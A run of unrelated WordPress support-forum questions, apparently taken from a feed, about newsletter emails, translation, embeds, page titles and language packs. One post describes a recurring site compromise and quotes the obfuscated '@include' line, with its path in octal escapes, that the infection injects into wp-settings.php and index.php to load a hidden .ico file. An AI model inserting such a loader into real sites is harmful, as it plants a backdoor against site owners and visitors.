I’m trying to ensure that not every blog post I make is emailed to my subscribers. I post frequently (3-4 times daily) but might only want one post emailed weekly. Since I post often from the mobile app, manually toggling “Post Only” in the desktop-only pre-publish checks isn’t a convenient workflow.
In the Newsletter settings (Dashboard > Settings > Newsletter > Newsletter Categories), I expected this feature to solve the problem. I set three categories as available for subscription: 1) Featured, 2) Steve’s Blog, and 3) Uncategorized. I then tested with two accounts:
Ultimately, I want to publish certain posts (e.g., a quick photo or personal note) without notifying subscribers or flooding email inboxes and feed readers. My goal is for subscribers to only receive emails for posts categorized under their selected preferences—or none at all for posts I leave uncategorized or assign to a non-enabled category.
Right now, the system doesn’t appear to respect these category preferences or provide a seamless way to control email notifications. I’d appreciate any guidance or clarification on how to achieve this.
*I know this might be possible with upgrades and plugins, but I want to thoroughly max out free options first* and plan on doing everything I can with free version this year.
Okay so after more testing just to confirm. The email will not go to the subscriber if they have toggled off the option (even though pre-publish numbers don’t reflect it). However, this still seems too overly complicated. Posts could/would default too uncategorized. However, it seems when someone subscribes, they are defaulted to ‘all content’, in addition to being offered the categories defaulted as on.
So essentially, the toggle options the receiving subscriber gets are going to receive everything by default. They would have to go in manually, toggle off the offered category option they don’t want. Which again, is just too far off for a realistic solution to me not wanting to blast out all of my content posts.
Thank you for your help!
]]>My websites blog posts have pagination buttons, here is an image https://imgur.com/a/kozAhda
As you can see it says “next Positus” which means, that the second part is translated but the first part is still in some default English.
Is it possible to edit this pagination somehow?
]]>I have an embedded code in my widgets. It is a Follow on Spotify button, and the code is provided by Spotify.
<iframe src=”https://open.spotify.com/follow/1/?uri=spotify:artist:0cylxW7HGdK9xMdubw2oYW&size=basic&theme=light” width=”200″ height=”25″ scrolling=”no” frameborder=”0″ style=”border:none; overflow:hidden;” allowtransparency=”true”></iframe>
Unfortunately, it does not redirect me anywhere. It somehow just works on mobile. I have tried using different browsers, different computers, and double checking pop-ups/redirecting is allowed and etc. Only mobile works.
This has been broken for a few weeks, so I believe it’s a setting I have somewhere on my website and not the code. (Spotify usually fixes/updates them within a few hours, especially with a feature this widely used) Does anyone have any ideas on what I can look for to help fix it?
Thank you!
]]>Can anyone tell me how to get them back to the bottom of the “edit page” page?
]]>It does all this:
– Chmod 755 to /var/www/html
– Changes wp-settings.php source to include at the top a line like this:
@include “\057var\057www\057htm\154/we\142ima\147es/\155oto\157nly\057.b2\067841\067f.i\143o”;
– it changes index.php in root to include that same line
– it changes all index.php in subfolders that are available to users for uploading data to include that same line
– In some random folder it installs an object called something like .c8981bb4.ico
A few seconds after it has done that, apache log shows a new request to server with something like:
or, alternatively
(abcdefgh can be any 8 character long sequence).
It doesnt seem to do any harm as site is working properly and there is no unusual network traffic that can be observed.
WordPress and all plugins are on the very last version. Not needed plugins and themes have all been removed.
Securi shows that wp-settings has been changed and I can repair it every morning without problem.
So the question really is, as everything is at the latest version, how is it possible that /wp/wp-admin/includes/upgrade.php is allowed to create this mess?
]]>you can see this on the following link:
I run a wordpress blog called https://cheaphomegrow.com. I’m currently using the 2016 theme. I’m having an issue with the “read settings”. When I choose article settings I’m choosing “summary” instead of showing the full article but if you visit my website you’ll see my full article is showing. How do I go about fixing this issue? Thanks
]]>I have a theme which i have installed, but when i set the page up i have seen that i now have a page title and and page location at the top of each page, which i have seen before and understand why its there, but i want to know if this can be removed?
For example the on the homepage which you can see by clicking on the link you will see just under the main slider it gives me the PAGE NAME on the left and on the right COMPANY NAME/BLOG
Am i missing something here?
]]>Yesterday I installed a language on my hosted WordPress site. (My hope was that if the language was installed but not used, my translator plugin would “recognize” the language on the site and not try to translate over the previous translation…didn’t work.)
The problem is that if this language is selected in the plugin now, the whole site goes French–dashboard included. I tried an English dashboard plugin, and it didn’t work. Ideally, I would like to just uninstall the language instead of deleting it totally, but if I have to delete it, I will. I’m just really nervous to poke around in functions code if I don’t know what I’m doing. Help would be appreciated.